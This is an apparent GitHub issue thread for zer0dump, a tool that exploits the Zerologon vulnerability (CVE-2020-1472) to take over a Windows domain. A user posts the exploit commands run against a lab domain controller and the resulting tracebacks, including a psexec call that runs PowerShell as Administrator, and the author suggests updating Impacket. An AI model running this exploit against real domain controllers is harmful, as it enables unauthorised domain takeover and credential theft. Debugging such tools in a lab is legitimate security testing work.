bb00 / zer0dump

Abuse CVE-2020-1472 (Zerologon) to take over a domain and then repair the local stored machine account password.
176 stars 44 forks source link

Error #1

Closed fearx135 closed 4 years ago

fearx135 commented 4 years ago

There is an error:

kali@kalivb:/opt/zer0dump$ python3 zer0dump.py DC-Company 192.168.101.5 Performing authentication attempts...

Success! DC can be fully compromised by a Zerologon attack. Traceback (most recent call last): File "zer0dump.py", line 136, in perform_attack('\\' + dc_name, dc_ip, dc_name) File "zer0dump.py", line 83, in perform_attack blah = nrpc.hNetrServerPasswordSet2( AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'hNetrServerPasswordSet2'

bb00 commented 4 years ago

Update your copy of Impacket to the latest release from https://github.com/SecureAuthCorp/impacket

fearx135 commented 4 years ago

Updated but now it's a diferent error

sudo python3 zer0dump.py DC-Company 192.168.101.5 Performing authentication attempts...

Success! DC can be fully compromised by a Zerologon attack. NetrServerPasswordSet2Response ReturnAuthenticator:
Credential:
Data: b'\x01\xcfpx;\x9e\x04\x03' Timestamp: 0 ErrorCode: 0 ERROR:root:ERROR_DS_NAME_ERROR_NOT_FOUND: Name translation: Could not find the name or insufficient right to see name. Traceback (most recent call last): File "zer0dump.py", line 136, in perform_attack('\\' + dc_name, dc_ip, dc_name) File "zer0dump.py", line 113, in perform_attack psexec = psexec.PSEXEC('powershell.exe -c Reset-ComputerMachinePassword', None, None, None, hashes=hashes, username="Administrator", serviceName='fucked') File "/opt/zer0dump/psexec.py", line 78, in init self.lmhash, self.nthash = hashes.split(':') ValueError: not enough values to unpack (expected 2, got 1)

This is the impacket version (0.9.22)

kali@kalivb:/opt/zer0dump$ pip3 show impacket Name: impacket Version: 0.9.22.dev1+20200915.115225.78e8c8e4 Summary: Network protocols Constructors and Dissectors Home-page: https://www.secureauth.com/labs/open-source-tools/impacket Author: SecureAuth Corporation Author-email: oss@secureauth.com License: Apache modified Location: /home/kali/.local/lib/python3.8/site-packages Requires: pycryptodomex, flask, ldap3, six, pyOpenSSL, ldapdomaindump, pyasn1 Required-by: crackmapexec